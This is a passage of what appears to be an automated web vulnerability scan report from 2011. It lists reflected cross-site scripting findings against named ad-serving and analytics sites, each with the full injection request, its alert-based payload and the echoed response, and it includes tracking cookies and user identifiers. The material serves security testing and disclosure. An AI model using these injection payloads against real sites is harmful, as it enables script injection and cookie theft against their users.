Date: Mon, 13 Jun 2011 11:23:21 GMT
Connection: close

BF_PARTNER.gate_responseb463b<script>alert(1)</script>d7c1406750d(1307931934);

4.224. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/83240/6ff44b0268185d901ef2d93cd3d3a48f

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 667d7<script>alert(1)</script>720a5b2a352 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /83240/6ff44b0268185d901ef2d93cd3d3a48f?callback=BF_PARTNER.gate_response667d7<script>alert(1)</script>720a5b2a352&cb=2206 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Mon, 20 Jun 2011 11:24:06 GMT
Date: Mon, 13 Jun 2011 11:24:06 GMT
Connection: close

BF_PARTNER.gate_response667d7<script>alert(1)</script>720a5b2a352(1307740416);

4.225. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d5ee'%3balert(1)//7e44292adfa was submitted in the admeld_callback parameter. This input was echoed as 6d5ee';alert(1)//7e44292adfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match6d5ee'%3balert(1)//7e44292adfa HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1305508826+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICIxMTMiOiBbIkZRV1dDMlZLMkRXRiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDI3Ml19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuGY/J5VgFHiQsPm9ywKjBoN27a+ZzFgtADzuWQ43k5kA8qehcp2Nm4Gy56Fyv5eCNI7Fyo7d/EOsCyYzyXBcfclC1B2xocGsOyMcyCTGSwYuEQ4ds5nFciS+PQeJMOgwQAWFeWY+YNFoJVZYtFpVOFdX1kEJjJKnFv+/x2y8CygGdcYJa68/IckLMJx9gWrALPEvqf3UEQ/vgI7dNcFFNFZG0Git74fRIgCAGMOVek="; io_freq_p1="eJzjEuZ4HCPAKHGhYfN7FgNGCzDNJc6xJB4oeBbEUWDQYABKnIVKXAgFSsxFkgCzuYQ5ngYAJWZ8aIBKMFgwcIlwbAsVOMAk8ek9quiPQIFWZolFp1FFbwUKTGSUOLf8/zuEqDDH5hgBZol9T++hCB4FOXnurgsogt3hQMFb3w8iBAHgcj64"; segments_p1="eJwdkMFKAmEUhdGZxc+sfLD29Qo9hriIJF3YqiiirE1EpM5CkVyFk0TkJsoCIVCjUFBaGMw00/3O5vBx7uWc+/+B71ZdL/DdOMmZPv7mTT87OLM3uDZFFxP0QdPI2HPppmElwgi12FfAWQIfLeDmLXwsp79GL4oEz2N4ZPueGziTiO3LJ2b3Ci9uGR7uYw/U3IvhUoqGGU77Gv54h5+b8IGuK2UENJzht3r2WvRkG6DeEiqrsYK/eui0pePk17roj1pHQ04a6vQbPbIy0z9oevqinzlBr2JK6gWT8ja5qj5X4l3ZCwK3M8kVXtvVpW/O+o/tlBvHu1TUk/w/jaxtDA=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:03:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 13-Jun-2011 11:02:53 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 752

document.write('<img width="0" height="0" src="http://tag.admeld.com/match6d5ee';alert(1)//7e44292adfa?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308394993&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C368
...[SNIP]...

4.226. http://s26.sitemeter.com/js/counter.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s26.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 285b0'%3balert(1)//06f5f020094 was submitted in the site parameter. This input was echoed as 285b0';alert(1)//06f5f020094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/counter.asp?site=s26mavsmoneyball285b0'%3balert(1)//06f5f020094&ocd=1 HTTP/1.1
Host: s26.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jun 2011 11:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7261
Content-Type: application/x-javascript
Expires: Mon, 13 Jun 2011 11:17:42 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s26mavsmoneyball285b0';alert(1)//06f5f020094', 's26.sitemeter.com', '');

var g_sLastCodeName = 's26mavsmoneyball285b0';alert(1)//06f5f020094';
// ]]>
...[SNIP]...

4.227. http://s26.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s26.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97554'%3balert(1)//04c82bfafc9 was submitted in the site parameter. This input was echoed as 97554';alert(1)//04c82bfafc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=s26mavsmoneyball97554'%3balert(1)//04c82bfafc9&ocd=1 HTTP/1.1
Host: s26.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jun 2011 11:01:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7261
Content-Type: application/x-javascript
Expires: Mon, 13 Jun 2011 11:11:49 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s26mavsmoneyball97554';alert(1)//04c82bfafc9', 's26.sitemeter.com', '');

var g_sLastCodeName = 's26mavsmoneyball97554';alert(1)//04c82bfafc9';
// ]]>
...[SNIP]...

4.228. http://s46.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d757a'%3balert(1)//c897de0178d was submitted in the site parameter. This input was echoed as d757a';alert(1)//c897de0178d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=s46fansidedd757a'%3balert(1)//c897de0178d HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jun 2011 11:21:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Mon, 13 Jun 2011 11:31:02 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46fansidedd757a';alert(1)//c897de0178d', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46fansidedd757a';alert(1)//c897de0178d';
// ]]>
...[SNIP]...

4.229. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acd6e'-alert(1)-'6bd58a07c87 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439acd6e'-alert(1)-'6bd58a07c87&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1672
Date: Mon, 13 Jun 2011 11:19:48 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:48 GMT; path=/
Set-Cookie: pubfreq_27439_22527_1515802639=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:48 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:48 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439acd6e'-alert(1)-'6bd58a07c87" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LmsAAC9rAAD/VwAAAAAAAAAAAAAAAAAAAAAAAAAAAABsewAApQAAANgCAABaAAAAAAAAAAEAAABBRkZCRTI1MC05QTEyLTQ
...[SNIP]...

4.230. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a76d'-alert(1)-'c07288c1f75 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html4a76d'-alert(1)-'c07288c1f75&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1676
Date: Mon, 13 Jun 2011 11:19:48 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:48 GMT; path=/
Set-Cookie: pubfreq_27439_22527_246367935=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:48 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...
28&kadheight=90&kltstamp=1307963988&indirectAdId=31596&adServerOptimizerId=1&ranreq=0.2702138659078628&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html4a76d'-alert(1)-'c07288c1f75">
...[SNIP]...

4.231. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bd68'-alert(1)-'1ef39453fa0 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.27021386590786282bd68'-alert(1)-'1ef39453fa0&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1676
Date: Mon, 13 Jun 2011 11:19:50 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:50 GMT; path=/
Set-Cookie: pubfreq_27439_22527_488868711=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:50 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:50 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...
eId=27439&adId=22527&adServerId=165&kefact=0.890000&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kltstamp=1307963990&indirectAdId=31596&adServerOptimizerId=1&ranreq=0.27021386590786282bd68'-alert(1)-'1ef39453fa0&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html">
...[SNIP]...

4.232. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 886e1%3balert(1)//21e4cdbc81c was submitted in the cb parameter. This input was echoed as 886e1;alert(1)//21e4cdbc81c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded886e1%3balert(1)//21e4cdbc81c&pc=5941/13464 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; cd=false; dq=6|3|3|0; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13464^1; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; rdk=5941/13464; rdk2=0; ses2=13464^2; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:57 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1013
Cache-control: private
Set-Cookie: khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Tue, 11-Jun-2019 11:21:57 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Sports and Recreation,Travel and Tourism High Affinity,Travel and Tourism,Travel and Tourism (DE),Democrats",
tagcloud
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
oz_onPixelsLoaded886e1;alert(1)//21e4cdbc81c(oo_profile);
} catch(ignore) {}

4.233. http://thesouthern.com/app/port/bulkCommentCount.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/app/port/bulkCommentCount.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d7c8"%3b5d6b79aeb68 was submitted in the REST URL parameter 1. This input was echoed as 3d7c8";5d6b79aeb68 in the application's response.

